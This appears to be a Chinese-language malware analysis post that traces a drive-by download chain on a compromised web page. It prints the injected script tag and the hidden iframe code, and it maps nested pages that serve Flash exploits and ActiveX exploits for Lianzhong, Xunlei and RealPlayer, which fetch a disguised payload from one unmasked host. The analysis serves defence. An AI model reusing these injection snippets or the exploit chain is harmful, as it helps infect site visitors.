发现了挺久了,不过现在才有时间来分析一下。
该网页面发现代码:
/---
<script language="javascript" type="text/javascript" src="hxxp://a*lim*o*ma*.com/header_bg.gif"></script>
---/
#1 hxxp://a*lim*o*ma*.com/header_bg.gif 包含代码:
/---
document.write("<iframe src=hxxp://www.*eq**w0**06.cn/zzll/1.htm width=50 height=0 border=0></iframe>");}
---/
#1.1 hxxp://www.*eq**w0**06.cn/zzll/1.htm 包含代码:
/---
<Iframe src="hxxp://max**-**7*.cn/a154/fxx.htm" width=100 height=0></Iframe>
---/
#1.1.1 hxxp://max**-**7*.cn/a154/fxx.htm
会引用如下网页:
#1.1.1.1 hxxp://max**-**7*.cn/a154/fx.htm
检查用户浏览器类型,如果是MSIE,则输出代码:
/---
<iFrame src=ilink.html width=100 height=0></iframe>
---/
否则输出:
/---
<iframe src=flink.html width=100 height=0></iframe>
---/
#1.1.1.1.1 hxxp://max**-**7*.cn/a154/ilink.html
检查flash插件版本,并相应的下载:i115.swf、i45.swf、i16.swf、i64.swf、i28.swf、i47.swf。
#1.1.1.1.2 hxxp://max**-**7*.cn/a154/flink.html
检查flash插件版本,并相应的下载:f115.swf、f64.swf、f47.swf、f45.swf、f28.swf、f16.swf。
#1.1.1.2 hxxp://max**-**7*.cn/a154/ss.html
/---
文件不存在
---/
#1.1.1.3 hxxp://max**-**7*.cn/a154/ms06014.htm
#1.1.1.4 hxxp://max**-**7*.cn/a154/GLWORLD.html
利用联众世界(clsid:61F5C358-60FB-4A23-A312-D2B556620F20)漏洞下载hxxp://www.zmjjjyy.cn/new/a154.css
#1.1.1.5 hxxp://max**-**7*.cn/a154/sina.htm
/---
文件不存在
---/
#1.1.1.6 hxxp://max**-**7*.cn/a154/UU.htm
/---
文件不存在
---/
#1.1.1.7 hxxp://max**-**7*.cn/a154/Thunder.html
利用迅雷(clsid:F3E70CEA-956E-49CC-B444-73AFE593AD7F)漏洞下载hxxp://www.zmjjjyy.cn/new/a154.css
#1.1.1.8 hxxp://max**-**7*.cn/a154/real.htm
利用RealPlayer(IERPCtl.IERPCtl.1)漏洞下载hxxp://www.zmjjjyy.cn/new/a154.css
不攻击IE7
#1.1.1.9 hxxp://max**-**7*.cn/a154/Real.html
利用RealPlayer(clsid:CFCDAA03-8BE4-11CF-B84B-0020AFBBCCFA)漏洞下载hxxp://www.zmjjjyy.cn/new/a154.css
